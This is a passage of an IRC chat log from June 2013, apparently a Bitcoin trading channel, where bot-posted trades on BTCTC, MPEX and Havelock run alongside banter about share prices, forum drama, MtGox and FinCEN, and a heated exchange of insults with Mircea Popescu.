BTC [+] Jun 29 00:18:44 [BTCTC] [AMC-PT] 74 @ 0.0021 = 0.1554 BTC [-] Jun 29 00:18:45 [BTCTC] [AMC-PT] 5 @ 0.002012 = 0.0101 BTC [-] Jun 29 00:18:46 [BTCTC] [AMC-PT] 4000 @ 0.00201 = 8.04 BTC [-] Jun 29 00:18:47 [BTCTC] [AMC-PT] 150 @ 0.002003 = 0.3005 BTC [-] Jun 29 00:18:49 [BTCTC] [AMC-PT] 400 @ 0.002003 = 0.8012 BTC [-] Jun 29 00:18:50 [BTCTC] [AMC-PT] 50 @ 0.002 = 0.1 BTC [-] Jun 29 00:18:51 [BTCTC] [AMC-PT] 2 @ 0.002 = 0.004 BTC [-] Jun 29 00:18:53 [BTCTC] [AMC-PT] 20 @ 0.002 = 0.04 BTC [-] Jun 29 00:18:54 [BTCTC] [AMC-PT] 15 @ 0.002 = 0.03 BTC [-] Jun 29 00:18:55 [BTCTC] [AMC-PT] 27 @ 0.002 = 0.054 BTC [-] Jun 29 00:18:56 [BTCTC] [AMC-PT] 1 @ 0.00194 BTC [-] Jun 29 00:18:58 [BTCTC] [AMC-PT] 256 @ 0.00186 = 0.4762 BTC [-] Jun 29 00:19:31 lol Jun 29 00:19:50 meanwhile: [17:11] <+AssetBot> [AMC] 211 @ 0.00086001 = 0.18146211 [-] Jun 29 00:21:46 [BTCTC] [ASICMINER-PT] 1 @ 3.401 BTC [+] Jun 29 00:21:47 [BTCTC] [ASICMINER-PT] 1 @ 3.401 BTC [+] Jun 29 00:21:49 [BTCTC] [ASICMINER-PT] 3 @ 3.401 = 10.203 BTC [+] Jun 29 00:22:05 is that good or bad ? Jun 29 00:22:41 [BTCTC] [ASICMINER-PT] 1 @ 3.401001 BTC [+] Jun 29 00:23:03 good for laughs Jun 29 00:23:36 [BTCTC] [ASICMINER-PT] 1 @ 3.42 BTC [+] Jun 29 00:23:39 it's selling half price on BF compared to BTCTC Jun 29 00:24:07 and BTCTC IPO is selling less than 20% of "IPO" there Jun 29 00:24:29 [BTCTC] [ASICMINER-PT] 2 @ 3.441999 = 6.884 BTC [+] Jun 29 00:24:31 it's imploding Jun 29 00:26:30 [BTCTC] [TAT.ASICMINER] 27 @ 0.033999 = 0.918 BTC [+] Jun 29 00:27:48 [BTCTC] [AMC-PT] 300 @ 0.0019 = 0.57 BTC [+] Jun 29 00:28:21 [MPEX] [S.MPOE] 6100 @ 0.00083295 = 5.081 BTC [-] Jun 29 00:29:00 [BTCTC] [AMC-PT] 272 @ 0.00188 = 0.5114 BTC [-] Jun 29 00:29:02 [BTCTC] [AMC-PT] 407 @ 0.00186 = 0.757 BTC [-] Jun 29 00:30:38 [BTCTC] [TAT.ASICMINER] 23 @ 0.033999 = 0.782 BTC [+] Jun 29 00:31:36 [BTCTC] [TAT.ASICMINER] 30 @ 0.034 = 1.02 BTC [+] Jun 29 00:32:23 [BTCTC] [AMC-PT] 337 @ 0.00186 = 0.6268 BTC [-] Jun 29 00:33:00 [BTCTC] [ASICMINER-PT] 1 @ 3.413 BTC [-] Jun 29 00:34:54 heh Jun 29 00:36:10 [BTCTC] [TAT.ASICMINER] 55 @ 0.034 = 1.87 BTC [+] Jun 29 00:36:44 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Jun 29 00:39:23 [BTCTC] [AMC-PT] 63 @ 0.001515 = 0.0954 BTC [-] Jun 29 00:41:23 [HAVELOCK] [ASICM] 3 @ 0.033377 = 0.1001 BTC [+] Jun 29 00:41:29 [BTCTC] [AMC-PT] 101 @ 0.001515 = 0.153 BTC [-] Jun 29 00:42:01 [BTCTC] [AMC-PT] 100 @ 0.001515 = 0.1515 BTC [-] Jun 29 00:43:09 [MPEX] [S.MPOE] 10858 @ 0.00082927 = 9.0042 BTC [-] Jun 29 00:43:13 [BTCTC] [AMC-PT] 31 @ 0.001515 = 0.047 BTC [-] Jun 29 00:43:16 [MPEX] [S.MPOE] 9750 @ 0.00082923 = 8.085 BTC [-] Jun 29 00:43:39 [BTCTC] [AMC-PT] 31 @ 0.001515 = 0.047 BTC [-] Jun 29 00:43:41 I wish I could short AMC. Jun 29 00:43:55 [BTCTC] [AMC-PT] 31 @ 0.0025 = 0.0775 BTC [+] Jun 29 00:44:23 [BTCTC] [S.MPOE-PT] 7 @ 0.00085 = 0.006 BTC [-] Jun 29 00:44:25 [BTCTC] [S.MPOE-PT] 9 @ 0.00085 = 0.0077 BTC [-] Jun 29 00:44:41 kinda late Jun 29 00:44:46 lol check this out Jun 29 00:44:49 it's begun Jun 29 00:45:03 "i think there is only one good exit from this mess. everyone holding shares now should be granted amount of shares he paid of stated ipo price 0.0005, so if u paid 0.00025 and have 1 share u should be given 4 extra." Jun 29 00:45:31 [BTCTC] [AMC-PT] 31 @ 0.001514 = 0.0469 BTC [-] Jun 29 00:45:33 That's Step 7 Jun 29 00:45:39 That's the beginning? *tsk* the beginning includes pitchforks in my book. Jun 29 00:45:42 https://bitcointalk.org/index.php?topic=244724.msg2594734#msg2594734 Jun 29 00:45:48 How to Become a Bitcoin Investor in 8 Easy Steps (comic relief) Jun 29 00:45:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.033999 BTC [-] Jun 29 00:46:07 it's hard to explain puns to kleptomaniacs because they always take things literally Jun 29 00:46:11 [BTCTC] [ASICMINER-PT] 1 @ 3.391014 BTC [+] Jun 29 00:46:15 [BTCTC] [AMC-PT] 9 @ 0.001515 = 0.0136 BTC [+] Jun 29 00:46:24 lol Jun 29 00:46:34 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Jun 29 00:46:35 great joke! Jun 29 00:46:45 [BTCTC] [ASICMINER-PT] 1 @ 3.391014 BTC [+] Jun 29 00:47:04 [BTCTC] [TAT.ASICMINER] 6 @ 0.033603 = 0.2016 BTC [-] Jun 29 00:47:09 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Jun 29 00:47:19 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [+] Jun 29 00:47:27 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Jun 29 00:47:31 [BTCTC] [AMC-PT] 5 @ 0.001515 = 0.0076 BTC [+] Jun 29 00:47:45 [BTCTC] [AMC-PT] 200 @ 0.001515 = 0.303 BTC [+] Jun 29 00:48:06 entropy isn't what it used to be. Jun 29 00:48:36 HEHE Jun 29 00:48:37 hehe Jun 29 00:48:46 TIL two jokes Jun 29 00:48:51 not one, but two Jun 29 00:49:03 [BTCTC] [AMC-PT] 164 @ 0.001515 = 0.2485 BTC [+] Jun 29 00:49:15 [BTCTC] [BITVPS] 1 @ 0.001099 BTC [-] Jun 29 00:49:28 [BTCTC] [ASICMINER-PT] 1 @ 3.386 BTC [+] Jun 29 00:49:38 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Jun 29 00:49:44 http://i.imgur.com/KVEIqaq.jpg Jun 29 00:49:53 PUT #971/0 d, 2 h, 18 m/31/0.00250000/0.00052500/0.00197500 Jun 29 00:49:58 [BTCTC] [ASICMINER-PT] 1 @ 3.419999 BTC [+] Jun 29 00:50:10 [BTCTC] [ASICMINER-PT] 1 @ 3.3 BTC [-] Jun 29 00:50:11 There's 0.015 there for anyone who bothers picking it up. Jun 29 00:50:48 [BTCTC] [TAT.ASICMINER] 4 @ 0.034 = 0.136 BTC [+] Jun 29 00:50:56 [BTCTC] [AMC-PT] 269 @ 0.001514 = 0.4073 BTC [-] Jun 29 00:50:58 [BTCTC] [AMC-PT] 1300 @ 0.001512 = 1.9656 BTC [-] Jun 29 00:50:59 [BTCTC] [AMC-PT] 150 @ 0.0015 = 0.225 BTC [-] Jun 29 00:51:01 [BTCTC] [AMC-PT] 35 @ 0.0015 = 0.0525 BTC [-] Jun 29 00:52:51 [BTCTC] [ASICMINER-PT] 2 @ 3.419998 = 6.84 BTC [+] Jun 29 00:53:10 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Jun 29 00:53:51 lmao Jun 29 00:54:47 [HAVELOCK] [ASICM] 7 @ 0.03281 = 0.2297 BTC [-] Jun 29 00:55:03 [HAVELOCK] [ASICM] 18 @ 0.03281 = 0.5906 BTC [-] Jun 29 00:55:05 [HAVELOCK] [ASICM] 89 @ 0.032801 = 2.9193 BTC [-] Jun 29 00:55:06 [HAVELOCK] [ASICM] 6 @ 0.0328 = 0.1968 BTC [-] Jun 29 00:56:10 "Unfortunately the burnt fingers were mostly weak hands. A stock is healthier without them - that's the cruel truth. The canny operators are the ones who did not sell. Today's opportunistic sellers who plan to buy back in will most likely make a loss unless they time it well. The price will be back at 0.0025 within a few days." Jun 29 00:58:01 Just read that comment too TAT. Jun 29 00:58:32 friggin delusion fog up in that thread Jun 29 00:58:51 How to check stock volume on btct Jun 29 00:58:53 it's been scarey funny to read the past two days Jun 29 00:58:57 I forgot :( Jun 29 00:59:39 [BTCTC] [AMC-PT] 1500 @ 0.0015 = 2.25 BTC [-] Jun 29 01:01:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.0342 BTC [+] Jun 29 01:02:28 who the fuck makes that sort of statement about stock price. Jun 29 01:02:47 [HAVELOCK] [HIM] 1 @ 0.3189921 BTC [+] Jun 29 01:02:51 does this guy operate the company and is represented by the stock price, or does he operate the stock price and is representing the company ?! Jun 29 01:03:51 just delusional idiot making excuses for holding and not selling at 25 Jun 29 01:05:58 o thought it was the guy himself. Jun 29 01:06:03 Yahoo is shutting down AltaVista Jun 29 01:06:15 finally. Jun 29 01:06:57 http://www.theregister.co.uk/2013/06/28/google_wants_84m_tax_refund/ Jun 29 01:06:58 [BTCTC] [DMS.SELLING] 23 @ 0.032 = 0.736 BTC [+] Jun 29 01:07:30 involves stock warrants! Jun 29 01:08:43 [BTCTC] [AMC-PT] 1 @ 0.0015 BTC [-] Jun 29 01:09:02 [HAVELOCK] [HIM] 5 @ 0.3189921 = 1.595 BTC [+] Jun 29 01:09:28 [BTCTC] [BASIC-MINING] 1 @ 0.209772 BTC [+] Jun 29 01:09:40 http://www.theverge.com/2013/6/28/4475564/government-wiretaps-foiled-by-encryption-for-the-first-time Jun 29 01:09:42 Government wiretaps were foiled by encryption for the first time in 2012 | The Verge Jun 29 01:09:46 "I am very proud of the structure that we set up. We did it based on the incentives that the governments offered us to operate. It's called capitalism." Jun 29 01:09:57 lol for the first time my foot. Jun 29 01:11:30 where are all these juicy quotes from? Jun 29 01:11:53 [HAVELOCK] [ASICM] 48 @ 0.033376 = 1.602 BTC [+] Jun 29 01:12:17 [BTCTC] [AMC-PT] 104 @ 0.0015 = 0.156 BTC [-] Jun 29 01:14:58 [BTCTC] [DMS.MINING] 6 @ 0.023297 = 0.1398 BTC [-] Jun 29 01:16:12 [BTCTC] [DMS.SELLING] 2 @ 0.032499 = 0.065 BTC [+] Jun 29 01:19:09 [BTCTC] [ASICMINER-PT] 1 @ 3.386 BTC [-] Jun 29 01:19:11 [BTCTC] [ASICMINER-PT] 1 @ 3.385006 BTC [-] Jun 29 01:19:13 [BTCTC] [ASICMINER-PT] 1 @ 3.385005 BTC [-] Jun 29 01:19:14 [BTCTC] [ASICMINER-PT] 1 @ 3.385003 BTC [-] Jun 29 01:19:16 [BTCTC] [ASICMINER-PT] 1 @ 3.385002 BTC [-] Jun 29 01:21:06 [BTCTC] [ASICMINER-PT] 1 @ 3.385002 BTC [-] Jun 29 01:25:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [-] Jun 29 01:28:15 [BTCTC] [ASICMINER-PT] 2 @ 3.419991 = 6.84 BTC [+] Jun 29 01:29:29 [HAVELOCK] [ASICM] 10 @ 0.03337499 = 0.3337 BTC [-] Jun 29 01:31:04 [MPEX] [S.MPOE] 8200 @ 0.00082874 = 6.7957 BTC [-] Jun 29 01:31:39 [BTCTC] [CRYPTO-TRADE] 8 @ 0.2 = 1.6 BTC [+] Jun 29 01:33:03 if anyone wondered what is theymos up to: https://bitcointalk.org/index.php?topic=141503.msg2581376#msg2581376 Jun 29 01:33:35 [BTCTC] [ASICMINER-PT] 1 @ 3.419993 BTC [+] Jun 29 01:33:37 [BTCTC] [ASICMINER-PT] 1 @ 3.442 BTC [+] Jun 29 01:33:48 busy searching for moar treasurers Jun 29 01:34:49 anyone volunteer to become treasurer and then get scammer tagged? we can split bitbet win then ;) Jun 29 01:35:38 [BTCTC] [DMS.SELLING] 2 @ 0.032499 = 0.065 BTC [+] Jun 29 01:38:09 [BTCTC] [DMS.SELLING] 48 @ 0.0325 = 1.56 BTC [+] Jun 29 01:38:41 heck, i can try applying myself.. why not? Jun 29 01:40:21 lmao Jun 29 01:41:09 [BTCTC] [TAT.ASICMINER] 10 @ 0.034 = 0.34 BTC [-] Jun 29 01:48:07 dunno might be a good deal if the whole thing [the forums] blows up Jun 29 01:50:28 [HAVELOCK] [HIM] 4 @ 0.3189911 = 1.276 BTC [-] Jun 29 01:50:38 more likely is that theymos will get fed up and just pull a nefario Jun 29 01:51:18 let donators and treasurers sort it out between them, yay Jun 29 01:52:30 [HAVELOCK] [HIM] 1 @ 0.3189921 BTC [+] Jun 29 01:52:32 [HAVELOCK] [HIM] 9 @ 0.319 = 2.871 BTC [+] Jun 29 01:53:39 maybe theymos is interested in investment banking ;) Jun 29 01:53:55 [BTCTC] [AMC-PT] 164 @ 0.002099 = 0.3442 BTC [+] Jun 29 01:53:56 [BTCTC] [AMC-PT] 336 @ 0.0021 = 0.7056 BTC [+] Jun 29 01:55:38 [BTCTC] [ASICMINER-PT] 1 @ 3.442 BTC [+] Jun 29 01:55:40 [BTCTC] [ASICMINER-PT] 1 @ 3.444 BTC [+] Jun 29 01:55:42 [BTCTC] [ASICMINER-PT] 4 @ 3.44799 = 13.792 BTC [+] Jun 29 01:55:44 [BTCTC] [ASICMINER-PT] 5 @ 3.447991 = 17.24 BTC [+] Jun 29 01:55:46 [BTCTC] [ASICMINER-PT] 2 @ 3.448 = 6.896 BTC [+] Jun 29 01:55:48 [BTCTC] [ASICMINER-PT] 8 @ 3.4487 = 27.5896 BTC [+] Jun 29 01:55:50 [BTCTC] [ASICMINER-PT] 2 @ 3.45 = 6.9 BTC [+] Jun 29 01:55:52 [BTCTC] [ASICMINER-PT] 1 @ 3.45 BTC [+] Jun 29 01:55:58 [BTCTC] [ASICMINER-PT] 4 @ 3.46 = 13.84 BTC [+] Jun 29 01:57:32 [HAVELOCK] [ASICM] 4 @ 0.0326 = 0.1304 BTC [-] Jun 29 02:00:52 i imagine the guy is sick of it by now. Jun 29 02:01:36 [MPEX] [S.MPOE] 3415 @ 0.0008281 = 2.828 BTC [-] Jun 29 02:01:51 [MPEX] [S.MPOE] 2385 @ 0.00082762 = 1.9739 BTC [-] Jun 29 02:03:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.0342 = 0.171 BTC [+] Jun 29 02:04:21 [HAVELOCK] [ASICM] 25 @ 0.0326 = 0.815 BTC [-] Jun 29 02:04:46 [BTCTC] [AMC-PT] 3 @ 0.0021 = 0.0063 BTC [+] Jun 29 02:05:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.0342 BTC [+] Jun 29 02:05:41 [MPEX] [S.MPOE] 10415 @ 0.00082762 = 8.6197 BTC [-] Jun 29 02:05:45 [MPEX] [S.MPOE] 18200 @ 0.00082745 = 15.0596 BTC [-] Jun 29 02:05:47 [MPEX] [S.MPOE] 7735 @ 0.00082731 = 6.3992 BTC [-] Jun 29 02:08:04 [BTCTC] [AMC-PT] 800 @ 0.0021 = 1.68 BTC [+] Jun 29 02:09:49 [HAVELOCK] [ASICM] 1 @ 0.0326 BTC [-] Jun 29 02:11:20 posted my very unenthusiastic offer...just to see what gonna happen Jun 29 02:16:00 [BTCTC] [S.DICE-PT] 2 @ 0.002 = 0.004 BTC [-] Jun 29 02:16:01 [BTCTC] [S.DICE-PT] 23 @ 0.001782 = 0.041 BTC [-] Jun 29 02:17:02 [MPEX] [S.MPOE] 5200 @ 0.0008282 = 4.3066 BTC [+] Jun 29 02:17:04 [MPEX] [S.MPOE] 2200 @ 0.00082874 = 1.8232 BTC [+] Jun 29 02:17:06 [BTCTC] [AMC-PT] 10 @ 0.0021 = 0.021 BTC [+] Jun 29 02:17:07 [MPEX] [S.MPOE] 1150 @ 0.00082918 = 0.9536 BTC [+] Jun 29 02:17:09 [BTCTC] [GSDPT] 50 @ 0.002118 = 0.1059 BTC [+] Jun 29 02:19:04 [BTCTC] [AMC-PT] 100 @ 0.0021 = 0.21 BTC [+] Jun 29 02:19:38 [BTCTC] [DMS.MINING] 5 @ 0.023 = 0.115 BTC [-] Jun 29 02:19:40 [BTCTC] [DMS.MINING] 46 @ 0.023 = 1.058 BTC [-] Jun 29 02:19:49 [BTCTC] [AMC-PT] 351 @ 0.0021 = 0.7371 BTC [+] Jun 29 02:19:52 [BTCTC] [AMC-PT] 784 @ 0.0021 = 1.6464 BTC [+] Jun 29 02:20:22 [BTCTC] [AMC-PT] 48 @ 0.0021 = 0.1008 BTC [+] Jun 29 02:24:33 [BTCTC] [TAT.ASICMINER] 18 @ 0.034 = 0.612 BTC [-] Jun 29 02:27:05 [BTCTC] [AMC-PT] 290 @ 0.0021 = 0.609 BTC [+] Jun 29 02:27:14 [BTCTC] [AMC-PT] 140 @ 0.0021 = 0.294 BTC [+] Jun 29 02:31:35 [HAVELOCK] [HIM] 6 @ 0.319 = 1.914 BTC [+] Jun 29 02:31:41 [HAVELOCK] [HIM] 1 @ 0.32 BTC [+] Jun 29 02:31:50 [HAVELOCK] [HIM] 1 @ 0.33 BTC [+] Jun 29 02:31:55 [HAVELOCK] [HIM] 1 @ 0.33501 BTC [+] Jun 29 02:32:03 [HAVELOCK] [HIM] 43 @ 0.34 = 14.62 BTC [+] Jun 29 02:32:09 [HAVELOCK] [HIM] 5 @ 0.345 = 1.725 BTC [+] Jun 29 02:38:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [-] Jun 29 02:41:55 [BTCTC] [DMS.MINING] 54 @ 0.023 = 1.242 BTC [-] Jun 29 02:42:26 [BTCTC] [BITVPS] 2 @ 0.001099 = 0.0022 BTC [-] Jun 29 02:42:44 [BTCTC] [BASIC-MINING] 1 @ 0.199 BTC [-] Jun 29 02:46:35 [BTCTC] [AMC-PT] 11 @ 0.0018 = 0.0198 BTC [-] Jun 29 02:47:45 [BTCTC] [S.MPOE-PT] 20 @ 0.000994 = 0.0199 BTC [+] Jun 29 02:48:54 [BTCTC] [DMS.SELLING] 99 @ 0.03319 = 3.2858 BTC [+] Jun 29 02:50:07 [HAVELOCK] [ASICM] 545 @ 0.0326 = 17.767 BTC [-] Jun 29 02:51:20 lastlog jesuz Jun 29 02:51:23 shit Jun 29 02:51:32 anyone have the jesuz graphs links? I lost mine. Jun 29 02:52:09 will the bitcoin price collapse? Jun 29 02:52:22 it will do all sorts of things, enjoy Jun 29 02:52:52 if the price collapses this time around its over for credibility Jun 29 02:53:14 no it's not. Jun 29 02:53:16 that's for time to determine. but I understand your fear. Jun 29 02:53:33 it's just over for this particular bunch of noobs, which i'd like nothing more than to be fucking rid of. Jun 29 02:53:43 i see a dark regulation cloud in my sector of the world. Jun 29 02:53:56 never be rid of me, mp Jun 29 02:53:59 ;) Jun 29 02:54:01 all the twinkleidiots and max keisers and whatnots of the world can just go back to their usual timesinks Jun 29 02:54:12 you came in with the march punishing ? Jun 29 02:54:16 lol coming from the king scamer Jun 29 02:54:32 the "king scammer" is the king of longevity. who're you ? Jun 29 02:54:49 mircea you are using more clever scheming methods then the other libertards ill agree Jun 29 02:54:57 selling trash to idiots Jun 29 02:55:01 [BTCTC] [ASICMINER-PT] 1 @ 3.449 BTC [-] Jun 29 02:55:01 better then porn right? Jun 29 02:55:06 ... Jun 29 02:55:26 [BTCTC] [ASICMINER-PT] 1 @ 3.575 BTC [+] Jun 29 02:55:41 mircea_popescu post the blockchain of the 40k btc transactions for mpoe. Jun 29 02:55:55 of the "investor" Jun 29 02:56:03 we're at the point where you're explaining who're you. Jun 29 02:56:20 [BTCTC] [ASICMINER-PT] 1 @ 3.449 BTC [-] Jun 29 02:56:22 not at the point where random nobody doubles down his unrequited estimations with requests. Jun 29 02:56:32 dont matter who i am mircea Jun 29 02:56:32 [BTCTC] [ASICMINER-PT] 1 @ 3.575 BTC [+] Jun 29 02:56:36 mkay. see ya. Jun 29 02:56:36 post the blockchain transfer. Jun 29 02:56:41 LiteCoiner!*@* added to ignore list. Jun 29 02:56:51 [BTCTC] [ASICMINER-PT] 1 @ 3.45 BTC [-] Jun 29 02:57:04 [BTCTC] [ASICMINER-PT] 1 @ 3.575 BTC [+] Jun 29 02:57:19 you must be talking to someone ive ignored Jun 29 02:57:27 [BTCTC] [ASICMINER-PT] 1 @ 3.459 BTC [-] Jun 29 02:57:37 i guess you were faster than me. Jun 29 02:57:40 [BTCTC] [ASICMINER-PT] 1 @ 3.575 BTC [+] Jun 29 02:59:58 https://bitcointalk.org/index.php?topic=245925.0 um.. Jun 29 02:59:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.0342 = 0.0684 BTC [+] Jun 29 03:00:03 2013-06-28 WSJ.com - MtGox Appears to Register with FinCEN Jun 29 03:00:26 ;D Jun 29 03:00:35 better late than never. Jun 29 03:00:35 [BTCTC] [CRYPTO-TRADE] 7 @ 0.2 = 1.4 BTC [+] Jun 29 03:00:36 appears Jun 29 03:00:41 is the critical word Jun 29 03:00:48 likely they didn't dot an i. Jun 29 03:00:55 and will be shortly raided. Jun 29 03:01:34 i think they finally splurged and hired actual counsel Jun 29 03:01:39 rather than relying on murck Jun 29 03:01:57 with the result of being advised to do as many of the motions as possible on the theory that it'll maybe amount to good faith at the trial. Jun 29 03:03:00 [BTCTC] [AMC-PT] 389 @ 0.0018 = 0.7002 BTC [-] Jun 29 03:03:10 [BTCTC] [AMC-PT] 146 @ 0.001701 = 0.2483 BTC [-] Jun 29 03:03:10 fractional reserve trial? Jun 29 03:03:11 [BTCTC] [AMC-PT] 265 @ 0.0017 = 0.4505 BTC [-] Jun 29 03:04:11 nah, the entire misrepresentation under signature thing Jun 29 03:04:46 yes, he did fail to clear that up. signature was 2011 or something, then the laws changed in 2013. Jun 29 03:05:29 i don't think we will extrodinarily render him just yet. Jun 29 03:05:44 extra* Jun 29 03:05:52 and so on* Jun 29 03:06:05 it's not a question of extradition. Jun 29 03:06:23 https://en.wikipedia.org/wiki/Extraordinary_rendition Jun 29 03:06:25 specifically Jun 29 03:06:40 our kind of extradition Jun 29 03:06:42 he didnt do anything wrong Jun 29 03:06:50 agreed Jun 29 03:06:53 didnt keep up to date with the ever changing and confusing laws Jun 29 03:06:56 who gives a fuck? Jun 29 03:07:06 i signed me a petition and donated to eff when brucey got elected or what not. Jun 29 03:07:07 mircea_scammer!*@* added to ignore list. Jun 29 03:07:40 but your mum did, and now your here. Jun 29 03:07:48 you're* Jun 29 03:07:51 fucking brain Jun 29 03:07:52 i don't think the "i am using this account for myself" checkbox was added in 2013. Jun 29 03:07:58 seeing how it was there in 2011. Jun 29 03:10:04 hmm. good point mp.... i thought he simply misreprested his MSB questions, as the answers technically changed in 2013.. Jun 29 03:10:20 but you're saying he should have re-registered as the mtgox Llc what have you? Jun 29 03:10:29 with all MSB cleared up. Jun 29 03:10:37 that's pretty obvious. so he's dumb. Jun 29 03:10:47 did he have even one lawyer? Jun 29 03:11:41 i'm saying he went into the bank, opened a business acct for his new small biz Jun 29 03:11:46 they asked some q's, he made some answers. Jun 29 03:11:58 these answers were factually incorrect, he knew or should have known this. Jun 29 03:12:05 the textbook definition of fraud in thsi context. Jun 29 03:12:32 not something anyone actually goes to jail over, at least not usually. still. Jun 29 03:14:43 http://trilema.com/2013/mpoe-june-2013-statement/ Jun 29 03:14:46 MPOE, June 2013 Statement pe Trilema - Un blog de Mircea Popescu. Jun 29 03:14:51 one of the slowest option months in history. Jun 29 03:17:51 [BTCTC] [TAT.VIRTUALMINE] 170 @ 0.0049 = 0.833 BTC [+] Jun 29 03:18:04 [BTCTC] [BITVPS] 1 @ 0.001099 BTC [-] Jun 29 03:21:19 Manfred S. Drake ‏@Maandrake 8h Jun 29 03:21:19 @Mircea_Popescu U have been retweetet by a false and unlegal twitteraccount: @TeThus_ Please block Tethus_.Legal action is taken @Support Jun 29 03:21:28 Terje Thuseth ‏@TeThus 8h Jun 29 03:21:28 @Mircea_Popescu The twitteraccount @TeThus_ is fake and violating Twitter rules and policy. Please block this account "tethus_" @support Jun 29 03:22:05 this just blew my mind. who the fuckl has the time ?! Jun 29 03:23:55 [HAVELOCK] [VTX] 1 @ 0.482001 BTC [-] Jun 29 03:24:24 [HAVELOCK] [SDICE] 1 @ 0.183 BTC [+] Jun 29 03:24:40 [BTCTC] [AMC-PT] 235 @ 0.0017 = 0.3995 BTC [-] Jun 29 03:24:42 [BTCTC] [AMC-PT] 100 @ 0.0017 = 0.17 BTC [-] Jun 29 03:24:44 [BTCTC] [AMC-PT] 164 @ 0.001523 = 0.2498 BTC [-] Jun 29 03:24:45 [HAVELOCK] [KCIM] 2 @ 0.900001 = 1.8 BTC [-] Jun 29 03:24:47 [BTCTC] [AMC-PT] 1750 @ 0.001522 = 2.6635 BTC [-] Jun 29 03:24:48 [BTCTC] [AMC-PT] 130 @ 0.001521 = 0.1977 BTC [-] Jun 29 03:24:49 [BTCTC] [AMC-PT] 1000 @ 0.00152 = 1.52 BTC [-] Jun 29 03:24:51 [BTCTC] [AMC-PT] 222 @ 0.0015 = 0.333 BTC [-] Jun 29 03:24:52 [BTCTC] [AMC-PT] 100 @ 0.0015 = 0.15 BTC [-] Jun 29 03:25:00 [HAVELOCK] [HIM] 70 @ 0.325901 = 22.8131 BTC [-] Jun 29 03:25:18 [HAVELOCK] [ASICM] 1 @ 0.0326 BTC [-] Jun 29 03:26:27 [BTCTC] [AMC-PT] 1 @ 0.0014 BTC [-] Jun 29 03:26:29 [BTCTC] [AMC-PT] 1 @ 0.0014 BTC [-] Jun 29 03:26:36 [BTCTC] [AMC-PT] 100 @ 0.0014 = 0.14 BTC [-] Jun 29 03:27:02 [HAVELOCK] [ASICM] 5 @ 0.03251 = 0.1626 BTC [-] Jun 29 03:27:33 [HAVELOCK] [ASICM] 48 @ 0.0324 = 1.5552 BTC [-] Jun 29 03:27:44 [HAVELOCK] [ASICM] 1 @ 0.03192637 BTC [-] Jun 29 03:27:52 [BTCTC] [AMC-PT] 2 @ 0.0013 = 0.0026 BTC [-] Jun 29 03:28:00 [HAVELOCK] [ASICM] 1 @ 0.03181 BTC [-] Jun 29 03:28:11 [HAVELOCK] [ASICM] 60 @ 0.031777 = 1.9066 BTC [-] Jun 29 03:28:23 [HAVELOCK] [ASICM] 300 @ 0.03176 = 9.528 BTC [-] Jun 29 03:28:33 [HAVELOCK] [ASICM] 20 @ 0.03175001 = 0.635 BTC [-] Jun 29 03:28:48 [BTCTC] [AMC-PT] 2 @ 0.0015 = 0.003 BTC [+] Jun 29 03:28:59 [HAVELOCK] [KCIM] 1 @ 0.9 BTC [-] Jun 29 03:29:05 [HAVELOCK] [KCIM] 1 @ 0.75 BTC [-] Jun 29 03:29:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.034199 = 0.1368 BTC [-] Jun 29 03:29:20 [HAVELOCK] [SDICE] 7 @ 0.1821 = 1.2747 BTC [-] Jun 29 03:29:34 [HAVELOCK] [SDICE] 6 @ 0.182 = 1.092 BTC [-] Jun 29 03:32:26 [HAVELOCK] [ASICM] 201 @ 0.03175101 = 6.382 BTC [+] Jun 29 03:32:36 [HAVELOCK] [ASICM] 212 @ 0.03175001 = 6.731 BTC [-] Jun 29 03:32:51 [HAVELOCK] [ASICM] 187 @ 0.03171 = 5.9298 BTC [-] Jun 29 03:34:20 [BTCTC] [AMC-PT] 12 @ 0.00131 = 0.0157 BTC [-] Jun 29 03:40:11 [BTCTC] [TAT.ASICMINER] 30 @ 0.033623 = 1.0087 BTC [-] Jun 29 03:44:08 ;;next Jun 29 03:44:09 expecting re-test of 88 | lower targets 77-80, 67-72 | resistance: 96-98, 100-102, 105-107, 110 | support: 90-92 | #bitcoin [Fri, 28 Jun 2013 19:32:10 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 5 hours, 12 minutes, and 0 seconds ago Jun 29 03:47:03 [HAVELOCK] [ASICM] 1 @ 0.03171001 BTC [+] Jun 29 03:47:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005223 BTC [+] Jun 29 03:47:56 [HAVELOCK] [SDICE] 4 @ 0.182 = 0.728 BTC [-] Jun 29 03:47:57 [HAVELOCK] [SDICE] 8 @ 0.18 = 1.44 BTC [-] Jun 29 03:48:07 [HAVELOCK] [ASICM] 20 @ 0.03171001 = 0.6342 BTC [+] Jun 29 03:49:32 [BTCTC] [S.MPOE-PT] 20 @ 0.00085 = 0.017 BTC [-] Jun 29 03:49:54 [BTCTC] [AMC-PT] 120 @ 0.0015 = 0.18 BTC [+] Jun 29 03:54:27 [BTCTC] [AMC-PT] 177 @ 0.0015 = 0.2655 BTC [+] Jun 29 03:55:42 [BTCTC] [AMC-PT] 310 @ 0.001949 = 0.6042 BTC [+] Jun 29 03:55:49 [BTCTC] [S.DICE-PT] 64 @ 0.00181 = 0.1158 BTC [+] Jun 29 03:56:45 [BTCTC] [ASICMINER-PT] 3 @ 3.414077 = 10.2422 BTC [-] Jun 29 03:57:07 [BTCTC] [AMC-PT] 59 @ 0.00195 = 0.1151 BTC [+] Jun 29 03:57:40 [BTCTC] [ASICMINER-PT] 1 @ 3.448999 BTC [+] Jun 29 03:58:16 [BTCTC] [AMC-PT] 